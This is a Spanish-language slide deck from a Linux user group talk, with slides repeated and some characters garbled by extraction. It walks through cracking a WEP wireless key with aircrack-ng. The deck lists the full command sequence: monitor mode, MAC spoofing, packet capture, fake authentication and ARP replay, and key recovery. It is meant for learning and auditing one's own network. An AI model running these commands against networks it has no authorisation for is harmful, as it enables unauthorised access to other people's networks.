Aircrack-ng

Experimentando con la Seguridad de �MI� Wireless.

Alfredo Fiebig C.

a�ebig@linuxpuertomontt.cl

Grupo de Usuarios Linux Puerto Montt

GULiPM

www.linuxpuertomontt.cl

January 14, 2011

Sitio O�cial

www.aircrack-ng.org

Keys cracking program.

WEP and WPA-PSK.

Set of tools for auditing wireless networks.

Sitio O�cial

www.aircrack-ng.org

Keys cracking program.

WEP and WPA-PSK.

Set of tools for auditing wireless networks.

Sitio O�cial

www.aircrack-ng.org

Keys cracking program.

WEP and WPA-PSK.

Set of tools for auditing wireless networks.

Sitio O�cial

www.aircrack-ng.org

Keys cracking program.

WEP and WPA-PSK.

Set of tools for auditing wireless networks.

Modus Operandi

Opciones

Slitaz Live CD.

Disponible en http://www.aircrack-ng.org/

VMWare.

Disponible en http://www.aircrack-ng.org/

Instalar Aircrack-ng en Linux

RepositoriosSources

El otro sistema operativo de la ventana.

Requiere de Drivers especiales para cambiar el modeo de latarjeta wireless.

OJO, No todos los modelos o drivers de wireless son compatibles

Modus Operandi

Opciones

Slitaz Live CD.

Disponible en http://www.aircrack-ng.org/

VMWare.

Disponible en http://www.aircrack-ng.org/

Instalar Aircrack-ng en Linux

RepositoriosSources

El otro sistema operativo de la ventana.

Requiere de Drivers especiales para cambiar el modeo de latarjeta wireless.

OJO, No todos los modelos o drivers de wireless son compatibles

Modus Operandi

Opciones

Slitaz Live CD.

Disponible en http://www.aircrack-ng.org/

VMWare.

Disponible en http://www.aircrack-ng.org/

Instalar Aircrack-ng en Linux

RepositoriosSources

El otro sistema operativo de la ventana.

Requiere de Drivers especiales para cambiar el modeo de latarjeta wireless.

OJO, No todos los modelos o drivers de wireless son compatibles

Modus Operandi

Opciones

Slitaz Live CD.

Disponible en http://www.aircrack-ng.org/

VMWare.

Disponible en http://www.aircrack-ng.org/

Instalar Aircrack-ng en Linux

RepositoriosSources

El otro sistema operativo de la ventana.

Requiere de Drivers especiales para cambiar el modeo de latarjeta wireless.

OJO, No todos los modelos o drivers de wireless son compatibles

Herramientas Necesarias

1 Red Wi� para Vulnerar.

1 Very Inportant!

2 aircrack-ng.

1 apt-get install aircrack-ng2 yum install aircrack-ng

3 macchanger.

1 apt-get install macchanger2 yum install macchanger

4 Terminator.

1 Opcional

Herramientas Necesarias

1 Red Wi� para Vulnerar.

1 Very Inportant!

2 aircrack-ng.

1 apt-get install aircrack-ng2 yum install aircrack-ng

3 macchanger.

1 apt-get install macchanger2 yum install macchanger

4 Terminator.

1 Opcional

Herramientas Necesarias

1 Red Wi� para Vulnerar.

1 Very Inportant!

2 aircrack-ng.

1 apt-get install aircrack-ng2 yum install aircrack-ng

3 macchanger.

1 apt-get install macchanger2 yum install macchanger

4 Terminator.

1 Opcional

Herramientas Necesarias

1 Red Wi� para Vulnerar.

1 Very Inportant!

2 aircrack-ng.

1 apt-get install aircrack-ng2 yum install aircrack-ng

3 macchanger.

1 apt-get install macchanger2 yum install macchanger

4 Terminator.

1 Opcional

ATENCION

PRECAUCION

DEBE DESCONECTARSE DE TODA RED WIFI EN ESTE

MOMENTO!!!

Manos a la Obra

Consola 0

Activar el Modo Monitor en la interfaz wireless

airmon-ng start <interfaz>

Cambiar la mac del mon0 por una falsa

ifcon�g mon0 downmacchanger -m 00:11:22:33:44:55 mon0ifcon�g mon0 up

Escaneo Inicial de las Redes

airodump-ng mon0salimos una ves escogemos la red que deseamos estudiar.

Escuchar tra�co especi�co de la red

airodump-ng -c [canal] -w [nombre red] mon0Se puede agregar la opcion �bssid <mac ap> para ser maspreciso

Manos a la Obra

Consola 0

Activar el Modo Monitor en la interfaz wireless

airmon-ng start <interfaz>

Cambiar la mac del mon0 por una falsa

ifcon�g mon0 downmacchanger -m 00:11:22:33:44:55 mon0ifcon�g mon0 up

Escaneo Inicial de las Redes

airodump-ng mon0salimos una ves escogemos la red que deseamos estudiar.

Escuchar tra�co especi�co de la red

airodump-ng -c [canal] -w [nombre red] mon0Se puede agregar la opcion �bssid <mac ap> para ser maspreciso

Manos a la Obra

Consola 0

Activar el Modo Monitor en la interfaz wireless

airmon-ng start <interfaz>

Cambiar la mac del mon0 por una falsa

ifcon�g mon0 downmacchanger -m 00:11:22:33:44:55 mon0ifcon�g mon0 up

Escaneo Inicial de las Redes

airodump-ng mon0salimos una ves escogemos la red que deseamos estudiar.

Escuchar tra�co especi�co de la red

airodump-ng -c [canal] -w [nombre red] mon0Se puede agregar la opcion �bssid <mac ap> para ser maspreciso

Manos a la Obra

Consola 0

Activar el Modo Monitor en la interfaz wireless

airmon-ng start <interfaz>

Cambiar la mac del mon0 por una falsa

ifcon�g mon0 downmacchanger -m 00:11:22:33:44:55 mon0ifcon�g mon0 up

Escaneo Inicial de las Redes

airodump-ng mon0salimos una ves escogemos la red que deseamos estudiar.

Escuchar tra�co especi�co de la red

airodump-ng -c [canal] -w [nombre red] mon0Se puede agregar la opcion �bssid <mac ap> para ser maspreciso

Manos a la Obra

Manos a la Obra

Consola 1

Nos Asociamos con el AP y mantenemos la comunicacion

aireplay-ng -1 6000 -a [direccion MAC AP] -h00:11:22:33:44:55 mon0

Manos a la Obra

Consola 2

Generamos Tra�co en la red

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccionMAC] -h 00:11:22:33:44:55 mon0

Manos a la Obra

Consola 3

Crackeamos la Contraseña

aircrack-ng -z [nombre red].cap

Manos a la Obra

Resultado